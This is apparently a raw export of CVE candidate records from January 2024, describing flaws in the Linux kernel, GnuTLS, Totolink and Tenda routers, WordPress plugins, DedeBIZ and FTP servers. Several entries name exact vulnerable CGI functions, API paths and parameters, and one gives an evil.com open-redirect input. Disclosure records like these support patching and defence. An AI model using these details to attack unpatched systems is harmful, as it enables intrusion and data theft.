CVE    2024    582    Candidate    A memory leak flaw was found in the Linux kernel’s io_uring functionality in how a user registers a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then frees it. This flaw allows a local user to crash or potentially escalate their privileges on the system.    MISC:RHBZ#2254050   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2254050   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0582   |   URL:https://access.redhat.com/security/cve/CVE-2024-0582   |   MISC:https://bugs.chromium.org/p/project-zero/issues/detail?id=2504   |   URL:https://bugs.chromium.org/p/project-zero/issues/detail?id=2504   |   MISC:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c392cbecd8eca4c53f2bf508731257d9d0a21c2d   |   URL:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c392cbecd8eca4c53f2bf508731257d9d0a21c2d    Assigned (20240116)
CVE    2024    581    Candidate    An Uncontrolled Resource Consumption vulnerability has been found on Sandsprite Scdbg.exe, affecting version 1.0. This vulnerability allows an attacker to send a specially crafted shellcode payload to the '/foff' parameter and cause an application shutdown. A malware program could use this shellcode sequence to shut down the application and evade the scan.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/uncontrolled-resource-consumption-vulnerability-sandsprite-scdbg   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/uncontrolled-resource-consumption-vulnerability-sandsprite-scdbg    Assigned (20240116)
CVE    2024    580    Candidate    Omission of user-controlled key authorization in the IDMSistemas platform, affecting the QSige product. This vulnerability allows an attacker to extract sensitive information from the API by making a request to the parameter '/qsige.locator/quotePrevious/centers/X', where X supports values 1,2,3, etc.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/omission-key-controlled-authorization-qsige   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/omission-key-controlled-authorization-qsige    Assigned (20240116)
CVE    2024    579    Candidate    A vulnerability classified as critical was found in Totolink X2000R 1.0.0-B20221212.1452. Affected by this vulnerability is the function formMapDelDevice of the file /boafrm/formMapDelDevice. The manipulation of the argument macstr leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250795. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/X2000R/1/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/X2000R/1/README.md   |   MISC:https://vuldb.com/?ctiid.250795   |   URL:https://vuldb.com/?ctiid.250795   |   MISC:https://vuldb.com/?id.250795   |   URL:https://vuldb.com/?id.250795    Assigned (20240116)
CVE    2024    578    Candidate    A vulnerability classified as critical has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected is the function UploadCustomModule of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument File leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250794 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/8/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/8/README.md   |   MISC:https://vuldb.com/?ctiid.250794   |   URL:https://vuldb.com/?ctiid.250794   |   MISC:https://vuldb.com/?id.250794   |   URL:https://vuldb.com/?id.250794    Assigned (20240116)
CVE    2024    577    Candidate    A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been rated as critical. This issue affects the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument lang leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250793 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/7/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/7/README.md   |   MISC:https://vuldb.com/?ctiid.250793   |   URL:https://vuldb.com/?ctiid.250793   |   MISC:https://vuldb.com/?id.250793   |   URL:https://vuldb.com/?id.250793    Assigned (20240116)
CVE    2024    576    Candidate    A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been declared as critical. This vulnerability affects the function setIpPortFilterRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument sPort leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250792. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/6/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/6/README.md   |   MISC:https://vuldb.com/?ctiid.250792   |   URL:https://vuldb.com/?ctiid.250792   |   MISC:https://vuldb.com/?id.250792   |   URL:https://vuldb.com/?id.250792    Assigned (20240116)
CVE    2024    575    Candidate    A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been classified as critical. This affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument command leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250791. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/5/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/5/README.md   |   MISC:https://vuldb.com/?ctiid.250791   |   URL:https://vuldb.com/?ctiid.250791   |   MISC:https://vuldb.com/?id.250791   |   URL:https://vuldb.com/?id.250791    Assigned (20240116)
CVE    2024    574    Candidate    A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130 and classified as critical. Affected by this issue is the function setParentalRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument sTime leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250790 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/4/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/4/README.md   |   MISC:https://vuldb.com/?ctiid.250790   |   URL:https://vuldb.com/?ctiid.250790   |   MISC:https://vuldb.com/?id.250790   |   URL:https://vuldb.com/?id.250790    Assigned (20240116)
CVE    2024    573    Candidate    A vulnerability has been found in Totolink LR1200GB 9.1.0u.6619_B20230130 and classified as critical. Affected by this vulnerability is the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ip leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250789 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/3/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/3/README.md   |   MISC:https://vuldb.com/?ctiid.250789   |   URL:https://vuldb.com/?ctiid.250789   |   MISC:https://vuldb.com/?id.250789   |   URL:https://vuldb.com/?id.250789    Assigned (20240116)
CVE    2024    572    Candidate    A vulnerability, which was classified as critical, was found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected is the function setOpModeCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument pppoeUser leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250788. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/2/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/2/README.md   |   MISC:https://vuldb.com/?ctiid.250788   |   URL:https://vuldb.com/?ctiid.250788   |   MISC:https://vuldb.com/?id.250788   |   URL:https://vuldb.com/?id.250788    Assigned (20240116)
CVE    2024    571    Candidate    A vulnerability, which was classified as critical, has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. This issue affects the function setSmsCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument text leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250787. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/1/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/1/README.md   |   MISC:https://vuldb.com/?ctiid.250787   |   URL:https://vuldb.com/?ctiid.250787   |   MISC:https://vuldb.com/?id.250787   |   URL:https://vuldb.com/?id.250787    Assigned (20240116)
CVE    2024    570    Candidate    A vulnerability classified as critical was found in Totolink N350RT 9.3.5u.6265. This vulnerability affects unknown code of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. It is recommended to upgrade the affected component. VDB-250786 is the identifier assigned to this vulnerability.    MISC:https://drive.google.com/file/d/1xmGHvjMTaOn7v6buju5Ifuti3q47G7yF/view?usp=sharing   |   URL:https://drive.google.com/file/d/1xmGHvjMTaOn7v6buju5Ifuti3q47G7yF/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250786   |   URL:https://vuldb.com/?ctiid.250786   |   MISC:https://vuldb.com/?id.250786   |   URL:https://vuldb.com/?id.250786    Assigned (20240116)
CVE    2024    569    Candidate    A vulnerability classified as problematic has been found in Totolink T8 4.1.5cu.833_20220905. This affects the function getSysStatusCfg of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation of the argument ssid/key leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.5cu.862_B20230228 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-250785 was assigned to this vulnerability.    MISC:https://drive.google.com/file/d/1WSWrGEKUkvPk8hq1VRng-wbR7T6CknGY/view?usp=sharing   |   URL:https://drive.google.com/file/d/1WSWrGEKUkvPk8hq1VRng-wbR7T6CknGY/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250785   |   URL:https://vuldb.com/?ctiid.250785   |   MISC:https://vuldb.com/?id.250785   |   URL:https://vuldb.com/?id.250785    Assigned (20240116)
CVE    2024    568    Candidate    CWE-287: Improper Authentication vulnerability exists that could cause unauthorized tampering of device configuration over NFC communication.    MISC:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-044-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-044-02.pdf   |   URL:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-044-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-044-02.pdf    Assigned (20240116)
CVE    2024    567    Candidate    A vulnerability was found in GnuTLS, where a cockpit (which uses gnuTLS) rejects a certificate chain with distributed trust. This issue occurs when validating a certificate chain with cockpit-certificate-ensure. This flaw allows an unauthenticated, remote client or attacker to initiate a denial of service attack.    MISC:RHBZ#2258544   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258544   |   MISC:RHSA-2024:0533   |   URL:https://access.redhat.com/errata/RHSA-2024:0533   |   MISC:RHSA-2024:1082   |   URL:https://access.redhat.com/errata/RHSA-2024:1082   |   MISC:http://www.openwall.com/lists/oss-security/2024/01/19/3   |   URL:http://www.openwall.com/lists/oss-security/2024/01/19/3   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0567   |   URL:https://access.redhat.com/security/cve/CVE-2024-0567   |   MISC:https://gitlab.com/gnutls/gnutls/-/issues/1521   |   URL:https://gitlab.com/gnutls/gnutls/-/issues/1521   |   MISC:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7ZEIOLORQ7N6WRPFXZSYDL2MC4LP7VFV/   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7ZEIOLORQ7N6WRPFXZSYDL2MC4LP7VFV/   |   MISC:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/   |   MISC:https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html   |   URL:https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html   |   MISC:https://security.netapp.com/advisory/ntap-20240202-0011/   |   URL:https://security.netapp.com/advisory/ntap-20240202-0011/    Assigned (20240116)
CVE    2024    566    Candidate    The Smart Manager WordPress plugin before 8.28.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.    MISC:https://wpscan.com/vulnerability/ca83db95-4a08-4615-aa8d-016022404c32/   |   URL:https://wpscan.com/vulnerability/ca83db95-4a08-4615-aa8d-016022404c32/    Assigned (20240115)
CVE    2024    565    Candidate    An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service.    MISC:RHBZ#2258518   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258518   |   MISC:RHSA-2024:1188   |   URL:https://access.redhat.com/errata/RHSA-2024:1188   |   MISC:RHSA-2024:1404   |   URL:https://access.redhat.com/errata/RHSA-2024:1404   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0565   |   URL:https://access.redhat.com/security/cve/CVE-2024-0565   |   MISC:https://security.netapp.com/advisory/ntap-20240223-0002/   |   URL:https://security.netapp.com/advisory/ntap-20240223-0002/   |   MISC:https://www.spinics.net/lists/stable-commits/msg328851.html   |   URL:https://www.spinics.net/lists/stable-commits/msg328851.html    Assigned (20240115)
CVE    2024    564    Candidate    A flaw was found in the Linux kernel's memory deduplication mechanism. The max page sharing of Kernel Samepage Merging (KSM), added in Linux kernel version 4.4.0-96.119, can create a side channel. When the attacker and the victim share the same host and the default setting of KSM is "max page sharing=256", it is possible for the attacker to time the unmap to merge with the victim's page. The unmapping time depends on whether it merges with the victim's page and additional physical pages are created beyond the KSM's "max page share". Through these operations, the attacker can leak the victim's page.    MISC:RHBZ#2258514   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258514   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0564   |   URL:https://access.redhat.com/security/cve/CVE-2024-0564   |   MISC:https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1680513   |   URL:https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1680513   |   MISC:https://link.springer.com/conference/wisa   |   URL:https://link.springer.com/conference/wisa   |   MISC:https://wisa.or.kr/accepted   |   URL:https://wisa.or.kr/accepted    Assigned (20240115)
CVE    2024    563    Candidate    Denial of service condition in M-Files Server in versions before 24.2 (excluding 23.2 SR7 and 23.8 SR5) allows anonymous user to cause denial of service against other anonymous users.    MISC:https://www.m-files.com/about/trust-center/security-advisories/cve-2024-0563/   |   URL:https://www.m-files.com/about/trust-center/security-advisories/cve-2024-0563/    Assigned (20240115)
CVE    2024    562    Candidate    A use-after-free flaw was found in the Linux Kernel. When a disk is removed, bdi_unregister is called to stop further write-back and waits for associated delayed work to complete. However, wb_inode_writeback_end() may schedule bandwidth estimation work after this has completed, which can result in the timer attempting to access the recently freed bdi_writeback.    MISC:RHBZ#2258475   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258475   |   MISC:RHSA-2024:0412   |   URL:https://access.redhat.com/errata/RHSA-2024:0412   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0562   |   URL:https://access.redhat.com/security/cve/CVE-2024-0562   |   MISC:https://patchwork.kernel.org/project/linux-mm/patch/20220801155034.3772543-1-khazhy@google.com/   |   URL:https://patchwork.kernel.org/project/linux-mm/patch/20220801155034.3772543-1-khazhy@google.com/    Assigned (20240115)
CVE    2024    561    Candidate    The Ultimate Posts Widget WordPress plugin before 2.3.1 does not validate and escape some of its Widget options before outputting them back in attributes, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).    MISC:https://wpscan.com/vulnerability/99b6aa8b-deb9-48f8-8896-f3c8118a4f70/   |   URL:https://wpscan.com/vulnerability/99b6aa8b-deb9-48f8-8896-f3c8118a4f70/    Assigned (20240115)
CVE    2024    560    Candidate    A vulnerability was found in 3Scale when used with Keycloak 15 (or RHSSO 7.5.0) and later. When the auth_type is use_3scale_oidc_issuer_endpoint, the Token Introspection policy discovers the Token Introspection endpoint from the token_introspection_endpoint field, but the field was removed in RH-SSO 7.5. As a result, the policy doesn't inspect tokens and instead determines that all tokens are valid.    MISC:RHBZ#2258456   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258456   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0560   |   URL:https://access.redhat.com/security/cve/CVE-2024-0560   |   MISC:https://github.com/3scale/APIcast/pull/1438   |   URL:https://github.com/3scale/APIcast/pull/1438    Assigned (20240115)
CVE    2024    559    Candidate    The Enhanced Text Widget WordPress plugin before 1.6.6 does not validate and escape some of its Widget options before outputting them back in attributes, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).    MISC:https://research.cleantalk.org/cve-2024-0559/   |   URL:https://research.cleantalk.org/cve-2024-0559/   |   MISC:https://wpscan.com/vulnerability/b257daf2-9540-4a0f-a560-54b47d2b913f/   |   URL:https://wpscan.com/vulnerability/b257daf2-9540-4a0f-a560-54b47d2b913f/    Assigned (20240115)
CVE    2024    558    Candidate    A vulnerability has been found in DedeBIZ 6.3.0 and classified as critical. This vulnerability affects unknown code of the file /admin/makehtml_freelist_action.php. The manipulation of the argument startid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250726 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/JTZ-a/SRC/blob/master/DedeBIZ/DedeBIZ%20-%20sqli%201/README.md   |   URL:https://github.com/JTZ-a/SRC/blob/master/DedeBIZ/DedeBIZ%20-%20sqli%201/README.md   |   MISC:https://vuldb.com/?ctiid.250726   |   URL:https://vuldb.com/?ctiid.250726   |   MISC:https://vuldb.com/?id.250726   |   URL:https://vuldb.com/?id.250726    Assigned (20240115)
CVE    2024    557    Candidate    A vulnerability, which was classified as problematic, was found in DedeBIZ 6.3.0. This affects an unknown part of the component Website Copyright Setting. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250725 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/JTZ-a/SRC/blob/master/DedeBIZ/DedeBIZ%20-%20StoredXSS/README.md   |   URL:https://github.com/JTZ-a/SRC/blob/master/DedeBIZ/DedeBIZ%20-%20StoredXSS/README.md   |   MISC:https://vuldb.com/?ctiid.250725   |   URL:https://vuldb.com/?ctiid.250725   |   MISC:https://vuldb.com/?id.250725   |   URL:https://vuldb.com/?id.250725    Assigned (20240115)
CVE    2024    556    Candidate    A Weak Cryptography for Passwords vulnerability has been detected on WIC200 affecting version 1.1. This vulnerability allows a remote user to intercept the traffic and retrieve the credentials from another user and decode it in base64 allowing the attacker to see the credentials in plain text.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200    Assigned (20240115)
CVE    2024    555    Candidate    A Cross-Site Request Forgery (CSRF) vulnerability has been found on WIC1200, affecting version 1.1. An authenticated user could lead another user into executing unwanted actions inside the application they are logged in to. This vulnerability is possible due to the lack of a proper CSRF token implementation.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200    Assigned (20240115)
CVE    2024    554    Candidate    A Cross-site scripting (XSS) vulnerability has been found on WIC1200, affecting version 1.1. An authenticated user could store a malicious JavaScript payload in the device model parameter via '/setup/diags_ir_learn.asp', allowing the attacker to retrieve the session details of another user.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-full-compass-systems-wic1200    Assigned (20240115)
CVE    2024    553    Candidate    A vulnerability was found in GnuTLS. The response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from the response times of ciphertexts with correct PKCS#1 v1.5 padding. This issue may allow a remote attacker to perform a timing side-channel attack in the RSA-PSK key exchange, potentially leading to the leakage of sensitive data. CVE-2024-0553 is designated as an incomplete resolution for CVE-2023-5981.    MISC:RHBZ#2258412   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258412   |   MISC:RHSA-2024:0533   |   URL:https://access.redhat.com/errata/RHSA-2024:0533   |   MISC:RHSA-2024:0627   |   URL:https://access.redhat.com/errata/RHSA-2024:0627   |   MISC:RHSA-2024:0796   |   URL:https://access.redhat.com/errata/RHSA-2024:0796   |   MISC:RHSA-2024:1082   |   URL:https://access.redhat.com/errata/RHSA-2024:1082   |   MISC:RHSA-2024:1108   |   URL:https://access.redhat.com/errata/RHSA-2024:1108   |   MISC:http://www.openwall.com/lists/oss-security/2024/01/19/3   |   URL:http://www.openwall.com/lists/oss-security/2024/01/19/3   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0553   |   URL:https://access.redhat.com/security/cve/CVE-2024-0553   |   MISC:https://gitlab.com/gnutls/gnutls/-/issues/1522   |   URL:https://gitlab.com/gnutls/gnutls/-/issues/1522   |   MISC:https://lists.debian.org/debian-lts-announce/2024/02/msg00010.html   |   URL:https://lists.debian.org/debian-lts-announce/2024/02/msg00010.html   |   MISC:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7ZEIOLORQ7N6WRPFXZSYDL2MC4LP7VFV/   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7ZEIOLORQ7N6WRPFXZSYDL2MC4LP7VFV/   |   MISC:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/   |   MISC:https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html   |   URL:https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html   |   MISC:https://security.netapp.com/advisory/ntap-20240202-0011/   |   URL:https://security.netapp.com/advisory/ntap-20240202-0011/    Assigned (20240115)
CVE    2024    552    Candidate    Intumit inc. SmartRobot's web framework has a remote code execution vulnerability. An unauthorized remote attacker can exploit this vulnerability to execute arbitrary commands on the remote server.    MISC:https://www.twcert.org.tw/tw/cp-132-7662-41d50-1.html   |   URL:https://www.twcert.org.tw/tw/cp-132-7662-41d50-1.html    Assigned (20240115)
CVE    2024    551    Candidate    Enable exports of the database and associated exported information of the system via the default user role. The attacker would have to have been granted access to the system prior to the attack. It is worth noting that the deterministic nature of the export name is lower risk as the UI for exporting would start the download at the same time, which once downloaded - deletes the export from the system. The endpoint for exporting should simply be patched to a higher privilege level.    MISC:https://github.com/mintplex-labs/anything-llm/commit/7aaa4b38e7112a6cd879c1238310c56b1844c6d8   |   URL:https://github.com/mintplex-labs/anything-llm/commit/7aaa4b38e7112a6cd879c1238310c56b1844c6d8   |   MISC:https://huntr.com/bounties/f114c787-ab5f-4f83-afa5-c000435efb78   |   URL:https://huntr.com/bounties/f114c787-ab5f-4f83-afa5-c000435efb78    Assigned (20240115)
CVE    2024    550    Candidate    A user who is already privileged (`manager` or `admin`) can set their profile picture via the frontend API using a relative filepath and then use the PFP GET API to download any valid files. The attacker would have to have been granted privileged permissions to the system before executing this attack.    MISC:https://github.com/mintplex-labs/anything-llm/commit/e1dcd5ded010b03abd6aa32d1bf0668a48e38e17   |   URL:https://github.com/mintplex-labs/anything-llm/commit/e1dcd5ded010b03abd6aa32d1bf0668a48e38e17   |   MISC:https://huntr.com/bounties/c6afeb5e-f211-4b3d-aa4b-6bad734217a6   |   URL:https://huntr.com/bounties/c6afeb5e-f211-4b3d-aa4b-6bad734217a6    Assigned (20240115)
CVE    2024    548    Candidate    A vulnerability was found in FreeFloat FTP Server 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the component SIZE Command Handler. The manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250718 is the identifier assigned to this vulnerability.    MISC:https://packetstormsecurity.com/files/163038/FreeFloat-FTP-Server-1.0-Denial-Of-Service.html   |   URL:https://packetstormsecurity.com/files/163038/FreeFloat-FTP-Server-1.0-Denial-Of-Service.html   |   MISC:https://vuldb.com/?ctiid.250718   |   URL:https://vuldb.com/?ctiid.250718   |   MISC:https://vuldb.com/?id.250718   |   URL:https://vuldb.com/?id.250718    Assigned (20240114)
CVE    2024    547    Candidate    A vulnerability has been found in Ability FTP Server 2.34 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component APPE Command Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250717 was assigned to this vulnerability.    MISC:https://packetstormsecurity.com/files/163079/Ability-FTP-Server-2.34-Denial-Of-Service.html   |   URL:https://packetstormsecurity.com/files/163079/Ability-FTP-Server-2.34-Denial-Of-Service.html   |   MISC:https://vuldb.com/?ctiid.250717   |   URL:https://vuldb.com/?ctiid.250717   |   MISC:https://vuldb.com/?id.250717   |   URL:https://vuldb.com/?id.250717    Assigned (20240114)
CVE    2024    546    Candidate    A vulnerability, which was classified as problematic, has been found in EasyFTP 1.7.0. This issue affects some unknown processing of the component LIST Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250715.    MISC:https://packetstormsecurity.com/files/94905/EasyFTP-1.7.0.x-Denial-Of-Service.html   |   URL:https://packetstormsecurity.com/files/94905/EasyFTP-1.7.0.x-Denial-Of-Service.html   |   MISC:https://vuldb.com/?ctiid.250715   |   URL:https://vuldb.com/?ctiid.250715   |   MISC:https://vuldb.com/?id.250715   |   URL:https://vuldb.com/?id.250715    Assigned (20240114)
CVE    2024    545    Candidate    A vulnerability classified as problematic was found in CodeCanyon RISE Rise Ultimate Project Manager 3.5.3. This vulnerability affects unknown code of the file /index.php/signin. The manipulation of the argument redirect with the input http://evil.com leads to open redirect. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250714 is the identifier assigned to this vulnerability.    MISC:https://vuldb.com/?ctiid.250714   |   URL:https://vuldb.com/?ctiid.250714   |   MISC:https://vuldb.com/?id.250714   |   URL:https://vuldb.com/?id.250714    Assigned (20240114)
CVE    2024    543    Candidate    A vulnerability classified as critical has been found in CodeAstro Real Estate Management System up to 1.0. This affects an unknown part of the file propertydetail.php. The manipulation of the argument pid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250713 was assigned to this vulnerability.    MISC:https://drive.google.com/drive/folders/1U2nirIi6OtuCi-vrD2-VHyJbsHK5yA7t?usp=sharing   |   URL:https://drive.google.com/drive/folders/1U2nirIi6OtuCi-vrD2-VHyJbsHK5yA7t?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250713   |   URL:https://vuldb.com/?ctiid.250713   |   MISC:https://vuldb.com/?id.250713   |   URL:https://vuldb.com/?id.250713    Assigned (20240114)
CVE    2024    542    Candidate    A vulnerability was found in Tenda W9 1.0.0.7(4456). It has been rated as critical. Affected by this issue is the function formWifiMacFilterGet of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250712. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/7/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/7/README.md   |   MISC:https://vuldb.com/?ctiid.250712   |   URL:https://vuldb.com/?ctiid.250712   |   MISC:https://vuldb.com/?id.250712   |   URL:https://vuldb.com/?id.250712    Assigned (20240114)
CVE    2024    541    Candidate    A vulnerability was found in Tenda W9 1.0.0.7(4456). It has been declared as critical. Affected by this vulnerability is the function formAddSysLogRule of the component httpd. The manipulation of the argument sysRulenEn leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250711. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/6/README.md   |   URL:https://github.com/jylsec/vuldb/blob/main/Tenda/W9/6/README.md   |   MISC:https://vuldb.com/?ctiid.250711   |   URL:https://vuldb.com/?ctiid.250711   |   MISC:https://vuldb.com/?id.250711   |   URL:https://vuldb.com/?id.250711    Assigned (20240114)
